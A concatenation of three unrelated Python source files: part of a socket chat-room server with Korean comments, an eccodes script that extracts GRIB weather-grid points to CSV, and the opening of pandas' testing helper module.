#json 유효성 검사를 해야할듯
id = protocol['id']
action = protocol['action']
value = protocol['action_value']
response = {'id': id,
'action': '',
'action_value': ''}
if action == 'create':
response['action'] = 'resp'
if value not in self.rooms:
self.rooms[value] = [client_sock]
client_sock.room = value
response['action_value'] = 'OK'
else:
response['action_value'] = 'ERR'
client_sock.send(json.dumps(response))
elif action == 'join':
response['action'] = 'resp'
if value in self.rooms:
self.rooms[value].append(client_sock)
client_sock.room = value
response['action_value'] = 'OK'
else:
response['action_value'] = 'ERR'
client_sock.send(json.dumps(response))
elif action == 'send_msg':
response['action'] = action
response['action_value'] = value
msg = json.dumps(response)
if hasattr(client_sock, 'room') :
for client in self.rooms :
if client != client_sock :
client.send(msg)
else: #client가 join|craete 후에만 하면 이럴일 없지
pass #잘못된 프로토콜이라는 리스폰을 줄 필요있을까? 프로그래밍 잘못하면 에러가 나지만, 사용자의 반응에 의해 이런 예외가 발생할 일은 없다.
elif action == 'broadcast':
response['action'] = action
response['action_value'] = value
msg = json.dumps(response)
for client in self.clients:
if client != client_sock :
client.send(msg)
elif action == 'exit':
if hasattr(client_sock, 'room'):
self.rooms[client_sock.room].remove(client_sock)
client_sock.close()
elif action == 'out' : #방장이 나가면 방장위임문제도 생기네~~
pass
else :
pass # 잘못된 protocol
def run(self, ip, port, backlog=10):
self.server_sock.bind((ip, port))
self.server_sock.listen(backlog)
while True:
client = self.server_sock.accept()
clients.append(client)
threading.Thread(target=self.__client_th__, args=client[0]).start()
HOST = ''
PORT = 8000
clients = [] #socket list
s = socket()
s.bind((HOST, PORT))
s.listen(10)
while True :
client_socket = s.accept()
client_name = client_socket[0].recv(1024) # reccive name
clients.append(client_socket[0])
threading.Thread(target=client_th, args=(client_socket[0], client_name)).start()
|
UComp_multiprocess_NO-INTODB.py
|
#
# Copyright 2005-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities granted to it by
# virtue of its status as an intergovernmental organisation nor does it submit to any jurisdiction.
#
from __future__ import print_function
import traceback
import sys
import time
import datetime
from random import randint
#import mysql.connector
from multiprocessing import Process
from threading import Thread
from eccodes import *
INPUT = '../../data/reduced_latlon_surface.grib1'
VERBOSE = 1 # verbose error reporting
missingValue = 1e+20 # A value out of range
#def example(INPUT):
#def example(INPUT,y,yarr):
def example(INPUT,OUT,w,m,y,yarr):
indexarray = yarr.split(",");
forthenameoffile = yarr.replace(",","_");
test = datetime.datetime.now();
# name = "GribIndexPoints_"+forthenameoffile+"_"+m+"_"+y+"_" +OUT+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_Ronan_IW.csv";
# name = OUT+"_"+y+"_"+m+"_SWIMFull.csv";
# name = OUT+"_"+y+"_"+m+"_SWIMFull_started_"+test.strftime("%d_%m_%Y_%H:%M")+".csv";
#eskisi name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_started_"+test.strftime("%d_%m_%Y_%H:%M")+".csv";
name = OUT+"_"+y+"_"+m+"_GribIndexPoints_UKEA_started_"+test.strftime("%d_%m_%Y_%H_%M")+".csv";
f = open(INPUT, 'rb')
f2 = open('../../files/'+name, "a")
#critics ? ;)
# f2.write("index,lat,lon,value,dataDate,dataTime,validityDate,validityTime,name,shortname,units\n")
if w=='true':
sys.stdout.write("index,lat,lon,value,timestamp,name,shortname,units\n")
f2.write("index,lat,lon,value,dataDate,dataTime,validityDate,validityTime,name,shortname,units\n")
while 1:
gid = codes_grib_new_from_file(f)
if gid is None:
break
# Set the value representing the missing value in the field.
# Choose a missingValue that does not correspond to any real value in the data array
codes_set(gid, "missingValue", missingValue)
iterid = codes_grib_iterator_new(gid, 0)
i = 0
while 1:
result = codes_grib_iterator_next(iterid)
if not result:
break
for x in indexarray:
if i==int(x):
timestamp = ""
if codes_get(iterid, 'day') < 10:
timestamp = timestamp+"0"+str(codes_get(iterid, 'day'))
else:
timestamp = timestamp+str(codes_get(iterid, 'day'))
timestamp = timestamp+"-"+str(codes_get(iterid, 'month'))+"-"+str(codes_get(iterid, 'year'))
if codes_get(iterid, 'validityTime') == 0:
timestamp = timestamp+" 00:00:00"
elif codes_get(iterid, 'validityTime') < 1000:
eben = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" 0"+eben[0]+":00:00"
else:
eben2 = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" "+eben2[0]+eben2[1]+":00:00"
[lat, lon, value] = result
# sys.stdout.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, codes_get(iterid, 'dataDate'), codes_get(iterid, 'dataTime'), codes_get(iterid, 'validityDate'), codes_get(iterid, 'validityTime'), codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
sys.stdout.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, timestamp, codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
f2.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, codes_get(iterid, 'dataDate'), codes_get(iterid, 'dataTime'), codes_get(iterid, 'validityDate'), codes_get(iterid, 'validityTime'), codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
i += 1
codes_grib_iterator_delete(iterid)
codes_release(gid)
f.close()
def main():
try:
year=sys.argv[1]
yar=sys.argv[2]
except CodesInternalError as err:
if VERBOSE:
traceback.print_exc(file=sys.stderr)
else:
sys.stderr.write(err.msg + '\n')
return 1
if __name__ == "__main__":
year=sys.argv[1]
yar=sys.argv[3]
month=sys.argv[2]
if(int(month)<10):
smonth='0'+month;
else:
smonth=month;
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+year+'_12_33_105_10_0_FC3hr',year,yar)).start()
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+str(int(year)+1)+'_01_33_105_10_0_FC3hr',str(int(year)+1),yar)).start()
# example('MERA_PRODYEAR_2016_12_61_105_0_4_FC33hr','TotalPrecip')
# Process(target = example,args=('./backup/thread/Rainfall/MERA_PRODYEAR_'+year+'_'+smonth+'_61_105_0_4_FC33hr','TotalPrecip','true',smonth,year,yar)).start()
# Process(target = example,args=('/var/www/html/mera/map/backup/thread/Press/MERA_PRODYEAR_'+year+'_'+smonth+'_1_103_0_0_FC3hr','Pressure','true',smonth,year,yar)).start()
Process(target = example,args=('/var/www/html/mera/map/backup/thread/UComp/MERA_PRODYEAR_'+year+'_'+smonth+'_33_105_10_0_FC3hr','UComp','true',smonth,year,yar)).start()
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:119: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"always", _testing_mode_warnings # type: ignore[arg-type]
)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:126: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"ignore", _testing_mode_warnings # type: ignore[arg-type]
)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
# pandas\_testing.py:243: error: Incompatible types in assignment
# (expression has type "IO[Any]", variable has type "BinaryIO")
f = gzip.open(path, "rb") # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:245: error: Incompatible types in assignment
# (expression has type "BZ2File", variable has type "BinaryIO")
f = bz2.BZ2File(path, "rb") # type: ignore[assignment]
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
# pandas\_testing.py:252: error: Incompatible types in assignment
# (expression has type "IO[bytes]", variable has type "BinaryIO")
f = zip_file.open(zip_names.pop()) # type: ignore[assignment]
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
# pandas\_testing.py:288: error: Incompatible types in assignment
# (expression has type "Type[GzipFile]", variable has type
# "Type[ZipFile]")
compress_method = gzip.GzipFile # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:290: error: Incompatible types in assignment
# (expression has type "Type[BZ2File]", variable has type
# "Type[ZipFile]")
compress_method = bz2.BZ2File # type: ignore[assignment]
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
# pandas\_testing.py:302: error: Incompatible types in assignment
# (expression has type "Tuple[Any]", variable has type "Tuple[Any,
# Any]")
args = (data,) # type: ignore[assignment]
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
assert_equal(left._right, right._right, obj=f"{obj}.left", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
